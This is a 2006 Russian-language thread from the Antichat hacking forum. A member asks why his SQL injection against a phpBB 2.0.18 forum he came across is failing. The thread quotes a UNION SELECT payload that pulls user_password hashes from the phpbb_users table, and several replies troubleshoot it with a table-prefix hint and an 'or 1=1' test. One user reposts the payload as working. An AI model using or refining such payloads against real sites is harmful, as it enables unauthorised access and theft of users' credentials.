Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Вопрос насчет sql injection. |
11.04.2006, 16:16
|
|
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656
Репутация:
22
|
|
Вопрос насчет sql injection.
Я хотел бы узнать почему не получается провести sql injection,понимаю мембер ачата уже должен наизусть выучить все это и с этим у него не должно быть никаких проблем,но у мя возникли (может из за моей невнимательности).
Вот код
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id=айди юзера/* я нашел форум и решил попробовать на нем,как всегда у мя ничего не вышло =).Он после запроса выкидавал выкидывал на гшлавнубю страницу форума,то есть ни хеша ничего мне не выдает.Кстати форум на движке phpbb 2.0.18.
Спасибо за помощь.Не ругайтесь пожалуйста.=)
|
|
|
12.04.2006, 21:03
|
|
Новичок
Регистрация: 10.04.2006
Сообщений: 6
Провел на форуме:
2957
Репутация:
0
|
|
А кто сказал что префикс phpbb? и вообще, запрос может быть вполне неверен...
|
|
|
|
12.04.2006, 21:20
|
|
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656
Репутация:
22
|
|
ну извини я сначало видео посмотрел а потом поробовал.
|
|
|
|
12.04.2006, 23:44
|
|
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656
Репутация:
22
|
|
Народ в чем же ошибка?
|
|
|
|
12.04.2006, 23:47
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
может профиксили? попробуй просто -99+or+1=1 че будет
|
|
|
|
13.04.2006, 00:04
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
У меня так всё работает...
Код:
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*
ЗЫ чё-то как-то пробелы сами добавляются....
__________________
|
|
|
|
13.04.2006, 03:57
|
|
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656
Репутация:
22
|
|
Сообщение от max_pain89
может профиксили? попробуй просто -99+or+1=1 че будет
он меня так же выкидывает на index.php.Ничего не происходит.
Сообщение от +toxa+
У меня так всё работает...
Код:
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*
ЗЫ чё-то как-то пробелы сами добавляются.... ты имеешь ввиду у тя таким образом все получается?
|
|
|
|
13.04.2006, 04:12
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553
Репутация:
319
|
|
Сообщение от +toxa+
У меня так всё работает...
ты имеешь ввиду у тя таким образом все получается?
Судя по ответу работает-соответственно получается
|
|
|
|
13.04.2006, 08:10
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Мемберы античата не все разбираються в sql.
|
|
|
|
13.04.2006, 16:10
|
|
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656
Репутация:
22
|
|
успокойся,если не хочешь чтоб я был в мемберах так и скажи =)
Насчет вопроса - получается что профиксили?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
